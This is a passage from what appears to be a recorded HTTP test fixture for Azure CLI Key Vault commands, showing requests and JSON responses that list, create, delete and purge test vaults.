https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3daoMwAEbfRcbuYhJt1ymUsU0L3apiTCy7jBqdjX%2BYWKql7z4ZnJsPDt%2B5G5246VPdSWW4d%2BPsJ5Qlhmv8aj0oF8KWd7wSrei0yZdpFGbet1BNmcrHetB13ymIMly%2BbHYY4KxEYFMUHHCR2yDPHGtnlcjZOggOY3%2BtCzEqGNT52Ku%2B1Oa3mFM%2BNRoWohFaFP9DvfGhBtfVXM%2F3FsIOQCv4%2BUnJtdhL0e2ZTM8k%2FaKEkQP1U5YwJzqxhpXeEQe0mkOvssLl%2FRZ4%2FhwsbIlo80r89JNc4jmWxyVc2Db05C2k0iY0QKEf26tnR97HgVx%2BjMfjDw%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtpyhd4ow","name":"cli-keyvault-mgmtpyhd4ow","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtogun3gk5za6za6i74pcm5r43bych5oxsy36ysoqghrmht7gnt6tf2/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtpyhd4ow","location":"westus","tags":{},"deletionDate":"2019-12-27T07:58:35Z","scheduledPurgeDate":"2020-03-26T07:58:35Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtanybnhx","name":"cli-keyvault-mgmtanybnhx","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtqj3bis7oxmr6nxruc3wbrfs6xke2omhfebeeaws7l5vgg6rr4riez/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtanybnhx","location":"westus","tags":{},"deletionDate":"2019-12-27T05:55:29Z","scheduledPurgeDate":"2020-03-26T05:55:29Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtvwf6gkt","name":"cli-keyvault-mgmtvwf6gkt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtp5nzwk2pkrsxxy3ufum2gur7c3f7y3e4k6hiolzkmi2t7xrwif4yj/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtvwf6gkt","location":"westus","tags":{},"deletionDate":"2019-12-26T06:04:36Z","scheduledPurgeDate":"2020-03-25T06:04:36Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ba4MwAEb%2fi4y9aaLVdQplILHg1qRMTUofo8Z6V0zsxdL%2fPhl8LwcO53tqvbirQ9U3UvOe2imIExprnlYqNUoPgI73%2fCI60SuDL%2fMkjGzogJxTmU3VqKqhlwCmZvFhb03dTAuo23nOdS6yjZ6lrrW1Cug6LgTjNFyrXEwS4CqbBjkUyvgRD8bnVoFctEKJ%2fB%2fkFx8r%2fbqaa3xnQdPV4Trz%2fU026%2bPQiH5HG3aK2HcS0WifBIzG1D0eaEsLFJo4uTwIaiyM6AMvvw6uzxuM2CdBmRPVoU1geMeU3ggq%2faguEUn8PQ6YTxp6O9IzJAvWXq8%2f"}' headers: cache-control: - no-cache content-length: - '2315' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:43 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - dde572f9-a15e-4422-aa69-be321aaf4516 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ba4MwAEb%2Fi4y9aaLVdQplILHg1qRMTUofo8Z6V0zsxdL%2FPhl8LwcO53tqvbirQ9U3UvOe2imIExprnlYqNUoPgI73%2FCI60SuDL%2FMkjGzogJxTmU3VqKqhlwCmZvFhb03dTAuo23nOdS6yjZ6lrrW1Cug6LgTjNFyrXEwS4CqbBjkUyvgRD8bnVoFctEKJ%2FB%2FkFx8r%2Fbqaa3xnQdPV4Trz%2FU026%2BPQiH5HG3aK2HcS0WifBIzG1D0eaEsLFJo4uTwIaiyM6AMvvw6uzxuM2CdBmRPVoU1geMeU3ggq%2FaguEUn8PQ6YTxp6O9IzJAvWXq8%2F response: body: string: '{"value":[]}' headers: cache-control: - no-cache content-length: - '12' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:43 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - f3382181-218e-4ff7-9fef-9ca52aa6ccfc status: code: 200 message: OK - request: body: '{"location": "westus", "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [], "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "softDeleteRetentionInDays": 7, "enableRbacAuthorization": false}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive Content-Length: - '323' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n -l --retention-days --sku --enabled-for-deployment --enabled-for-disk-encryption --enabled-for-template-deployment --no-self-perms User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003","name":"cli-test-kv-mgmt-000003","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":7,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000003.vault.azure.net","provisioningState":"RegisteringDns"}}' headers: cache-control: - no-cache content-length: - '715' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:51 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1198' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive ParameterSetName: - -g -n -l --retention-days --sku --enabled-for-deployment --enabled-for-disk-encryption --enabled-for-template-deployment --no-self-perms User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003","name":"cli-test-kv-mgmt-000003","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":7,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000003.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '711' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:24:23 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resources?$filter=resourceType%20eq%20%27Microsoft.KeyVault%2Fvaults%27&api-version=2015-11-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/azure-cli-test-rg/providers/Microsoft.KeyVault/vaults/azureclitest-vault","name":"azureclitest-vault","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv5","name":"bim-kv5","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv8","name":"bim-kv8","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv-666","name":"bim-kv-666","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test1","name":"bim-sd-test1","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test2","name":"bim-sd-test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test3","name":"bim-sd-test3","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test4","name":"bim-sd-test4","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimkvTest","name":"bimkvTest","type":"Microsoft.KeyVault/vaults","location":"northcentralus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test","name":"bimtrack2test","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test2","name":"bimtrack2test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim_pl_test_rg/providers/Microsoft.KeyVault/vaults/bimplkv","name":"bimplkv","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003","name":"cli-test-kv-mgmt-000003","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengws1keyvault5d9d94ec6","name":"fengws1keyvault5d9d94ec6","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengwskeyvault7b56d2ee87","name":"fengwskeyvault7b56d2ee87","type":"Microsoft.KeyVault/vaults","location":"westus2","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest/providers/Microsoft.KeyVault/vaults/vault4848","name":"vault4848","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0227","name":"jlkv0227","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0309","name":"jlkv0309","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yeming/providers/Microsoft.KeyVault/vaults/yeming","name":"yeming","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyVault/vaults/zhoxingtest9393","name":"zhoxingtest9393","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyVault/vaults/zhoxingtest9ac53638","name":"zhoxingtest9ac53638","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}}]}' headers: cache-control: - no-cache content-length: - '5021' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:24:28 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete Connection: - keep-alive Content-Length: - '0' ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: DELETE uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003?api-version=2019-09-01 response: body: string: '' headers: cache-control: - no-cache content-length: - '0' date: - Mon, 23 Mar 2020 10:24:34 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-deletes: - '14999' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/northcentralus/deletedVaults/yugangwncu-kv","name":"yugangwncu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwncu/providers/Microsoft.KeyVault/vaults/yugangwncu-kv","location":"northcentralus","tags":{},"deletionDate":"2020-01-04T17:11:31Z","scheduledPurgeDate":"2020-04-03T17:11:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultjnsfjh6","name":"cmk-test-keyvaultjnsfjh6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgni6glhhbkokgvg4iwzohowsc2smndkbz467a7hg26dvpc7sdanz3p5xhbpeyecbti/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultjnsfjh6","location":"eastus","tags":{},"deletionDate":"2020-03-20T18:06:34Z","scheduledPurgeDate":"2020-06-18T18:06:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfsthqtt","name":"cmk-test-keyvaultfsthqtt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggdmpmbpy6ewfjuhaozsszfteklivu4jhnaiqszcrxh3onvrmv5ye6z6nx7lso3jsa/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfsthqtt","location":"eastus","tags":{},"deletionDate":"2020-03-19T07:53:34Z","scheduledPurgeDate":"2020-06-17T07:53:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfm6wjrk","name":"cmk-test-keyvaultfm6wjrk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwtx47ni5hkrbbmxddmqumh5mgmrcbrtcly2ukdtyhxtrbya2hjpw5kbreowxstb7u/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfm6wjrk","location":"eastus","tags":{},"deletionDate":"2020-03-13T18:06:12Z","scheduledPurgeDate":"2020-06-11T18:06:12Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/jlkv0311","name":"jlkv0311","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg/providers/Microsoft.KeyVault/vaults/jlkv0311","location":"eastus","tags":{},"deletionDate":"2020-03-11T14:11:34Z","scheduledPurgeDate":"2020-03-23T14:11:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvault5sqfx2x","name":"cmk-test-keyvault5sqfx2x","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmaeu767ym7nzvi3vj7xwbxxwidfk53lnm56h7zmeubkfbmpl4uwokt34w4hqdcl4n/providers/Microsoft.KeyVault/vaults/cmk-test-keyvault5sqfx2x","location":"eastus","tags":{},"deletionDate":"2020-03-06T18:14:23Z","scheduledPurgeDate":"2020-06-04T18:14:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test22wtltn3c","name":"kv-ssl-test22wtltn3c","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwikdo6eqepisjaezxd72ki4rvhirjaqy7tt2g7nb76i4vchoxxarcxcsna5kmw4cn/providers/Microsoft.KeyVault/vaults/kv-ssl-test22wtltn3c","location":"westeurope","tags":{},"deletionDate":"2020-03-20T18:10:08Z","scheduledPurgeDate":"2020-06-18T18:10:08Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test4nzdhgcpc","name":"kv-ssl-test4nzdhgcpc","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgylrzgouyxoqbo46qlxquz2ibbb47efjjjzoyhyx56diin333y2bv4tnyzvdnhks5j/providers/Microsoft.KeyVault/vaults/kv-ssl-test4nzdhgcpc","location":"westeurope","tags":{},"deletionDate":"2020-03-19T07:58:01Z","scheduledPurgeDate":"2020-06-17T07:58:01Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testahd35d2h7","name":"kv-ssl-testahd35d2h7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfi6unrzrgex22etdwxy5wixos3xp73m6q3ckrschl5e673yt2hbupuoel676kf6cf/providers/Microsoft.KeyVault/vaults/kv-ssl-testahd35d2h7","location":"westeurope","tags":{},"deletionDate":"2020-03-13T18:42:18Z","scheduledPurgeDate":"2020-06-11T18:42:18Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testdgnzfntdg","name":"kv-ssl-testdgnzfntdg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggvpg6n5vl3zdrlrhd2pheycnoaakok5ggno66zmdqitni7hdbq3rbwcgspssihmmm/providers/Microsoft.KeyVault/vaults/kv-ssl-testdgnzfntdg","location":"westeurope","tags":{},"deletionDate":"2020-03-06T18:54:05Z","scheduledPurgeDate":"2020-06-04T18:54:05Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastasia/deletedVaults/xxj-jedi-1","name":"xxj-jedi-1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/xiaojianxu/providers/Microsoft.KeyVault/vaults/xxj-jedi-1","location":"eastasia","tags":{},"deletionDate":"2020-03-06T15:27:15Z","scheduledPurgeDate":"2020-06-04T15:27:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southeastasia/deletedVaults/test-kv-kv","name":"test-kv-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/test-kv-kv","location":"southeastasia","tags":{},"deletionDate":"2020-01-12T17:14:55Z","scheduledPurgeDate":"2020-04-11T17:14:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-ef7h5yc4i","name":"cli-test-kv-sd-ef7h5yc4i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd3sy6wwddyn7upf5kz7biac6otb42h5lukakt4f4zvdfwmm4tv3jeslq/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-ef7h5yc4i","location":"eastus2","tags":{},"deletionDate":"2020-03-21T14:45:20Z","scheduledPurgeDate":"2020-06-19T14:45:20Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-opq6hvmd5","name":"cli-test-kv-sd-opq6hvmd5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdg4wncg7apey6kkl45mgws5a5w2w72nxjsxdli5f5fyaf77nqstt5f7y/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-opq6hvmd5","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:29:53Z","scheduledPurgeDate":"2020-06-08T13:29:53Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-sg2xy2ttq","name":"cli-test-kv-sd-sg2xy2ttq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd4ed2sssomniuokdoozvpwowez2cn3ysq62iz5qbll24fs63xvrhkbo6/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-sg2xy2ttq","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:18:34Z","scheduledPurgeDate":"2020-06-08T13:18:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-unajpf66i","name":"cli-test-kv-sd-unajpf66i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdtaj3w3eefnjm4o5twxj5xf3zlqjgofooerqpavl7lfmdfivm3c72zyk/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-unajpf66i","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:57:56Z","scheduledPurgeDate":"2020-06-08T12:57:56Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-vprnoufc7","name":"cli-test-kv-sd-vprnoufc7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdcscjau5ojn3wrsihkgo5qkppsib4st3u7oj2l3fu5sspzhlxhls3jre/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-vprnoufc7","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:48:26Z","scheduledPurgeDate":"2020-06-08T12:48:26Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/ygpl123-kv","name":"ygpl123-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygpl123/providers/Microsoft.KeyVault/vaults/ygpl123-kv","location":"centralus","tags":{},"deletionDate":"2020-01-29T17:11:24Z","scheduledPurgeDate":"2020-04-28T17:11:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/yg77778-kv","name":"yg77778-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yg77778/providers/Microsoft.KeyVault/vaults/yg77778-kv","location":"centralus","tags":{},"deletionDate":"2020-01-28T17:11:25Z","scheduledPurgeDate":"2020-04-27T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal2-kv","name":"testcmdportal2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/testcmdportal2/providers/Microsoft.KeyVault/vaults/testcmdportal2-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPurgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal-kv","name":"testcmdportal-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/testcmdportal/providers/Microsoft.KeyVault/vaults/testcmdportal-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPu